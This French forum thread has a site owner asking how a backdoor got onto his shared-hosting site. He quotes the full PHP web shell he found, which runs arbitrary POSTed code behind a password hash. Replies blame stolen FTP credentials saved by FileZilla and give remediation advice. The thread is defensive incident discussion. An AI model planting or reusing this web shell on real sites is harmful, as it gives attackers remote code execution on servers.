Aller au contenu

Mon site a été hacké, comment trouver la faille


Pat AfterMoon

Sujets conseillés

Bonjour,

Ce soir me connectant à mon site web par FTP j'ai découvert un truc que je n'avais jamais vu. Un répertoire a été créé avec un fichier PHP dedans, cela ressemble a un hack capable d'exécuter un code PHP transmis à distance.

Le répertoire s'appelait "hammerda" et le fichier 5bfa44.php.

Le contenu du fichier était le suivant :

<? if ( md5($_POST["PARAM_HASH"]) == "d673f1f28d9cddf84ad8aeb58d430b8e" ){ ?>
<? if(get_magic_quotes_gpc() == 1){ ?>
<? $post = stripslashes($_POST["f"]) ?>
<? }else{ ?><? $post = $_POST["f"] ?>
<? } ?>
<? $test_func = create_function("", $post) ?>
<? $test_func() ?>
<? } ?>
<? die ?>

D'après ce que j'en comprends cela permet d'envoyer du code source PHP à distance et de l'exécuter directement. Il y a même un système de protection pour éviter que n'importe qui utilise le script (en tout cas c'est comme ça que je comprends le PARAM_HASH).

J'imagine que cela permet d'envoyer du spam depuis mon serveur ou d'attaquer mon site depuis l'intérieur.

Bien sur j'ai effacé tout ça, mais je me demande comment le hackeur a réussi a le mettre chez moi.

Pour info, j'ai un hébergement mutualisé, PHP, MySQL, plusieurs scripts maison et un forum phpBB.

Modifié par Pat AfterMoon
Lien vers le commentaire
Partager sur d’autres sites

Effectivement, ca fait peur!

Il y a pas mal de problèmes en ce moment avec des comptes Filezilla piratés, est ce que c'est votre cas?

Lien vers le commentaire
Partager sur d’autres sites

Il y a pas mal de problèmes en ce moment avec des comptes Filezilla piratés

J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ?

Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.

Lien vers le commentaire
Partager sur d’autres sites

J'utilise Filezilla comme client FTP, mais quel est le rapport ? Quelle est cette histoire de "compte Filezilla piratés" ?

Je n'ai pas de "compte" FileZilla, par contre j'ai un compte FTP pour accéder à mon site web, et jusqu'à maintenant j'avais gardé le mot de passe attribué par défaut par OVH.

Parce que de nombreux "virus" s'attaquent aux comptes sauvegardés sur le PC.

Lien vers le commentaire
Partager sur d’autres sites

Bonjour,

Si tu demandes à FileZilla d'enregistrer des noms d'utilisateurs et des mots de passe FTP, il les enregistre en clair dans un fichier du PC. Si un agresseur peut accéder à ce fichier au moyen d'un logiciel espion, il obtient la liste des utilisateurs et mots de passe stockés par FileZilla dans ton PC.

Maintenant, il faut bien que FileZilla les stocke quelque part, à moins qu'on ne veuille les retaper à chaque connexion, mais alors on choisira probablement des mots de passe toujours les mêmes ou plus faciles à deviner.

En principe, avec un bon antivirus avec mises à jour automatiques, on évite de voir son PC contrôler par une personne malveillante.

Ici, c'est probablement impossible de trouver l'origine exacte de la faille. Je pense que captain_torche a bien résumé la situation. Il faut changer les mots de passe (je suppose que tu l'as fait entretemps) et utiliser les versions à jour des logiciels. Si cela ne suffit pas, il faudra tout réinstaller à partir d'originaux sains.

Jean-Luc

Lien vers le commentaire
Partager sur d’autres sites

Bien sur Filezilla doit stocker les mots de passe, c'est logique. Ce que je veux dire c'est que sur PC Filezilla est aujourd'hui le client FTP le plus populaire et que des outils automatisés existent.

Lien vers le commentaire
Partager sur d’autres sites

Merci pour vos réponses, mais vous m'avez rendu complètement parano :(

Ce qui m'embête c'est que je ne saurai jamais quelle est vraiment la faille sur ce coup. Ce qui m'inquiète le plus c'est mes scripts maison, car je ne maintiens plus trop ce site et que les risques de failles sont nombreux.

En tout cas à l'avenir si j'ai un nouveau site à faire je vais peux être revoir ma stratégie vis à vis de la formule Pro multi-domaine d'OVH. Parce sur ce coup la, avec un site hacké, c'est tous mes site qui sont exposés.

Par contre j'ai remplacé le script du hackeur par un script à moi qui stocke des infos en cas d'accès, et pour l'instant je n'ai eu aucun hit. Peut être que le script n'est utilisé qu'une seule fois juste après avoir été introduit. C'est dommage, j'aurais bien aimé voir l'adresse IP et le mot de passe :whistling:

Mais s'ils avaient poussé le vice jusqu'à effacer le script, je ne me serais même pas rendu compte de quoi que ce soit.

Lien vers le commentaire
Partager sur d’autres sites

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...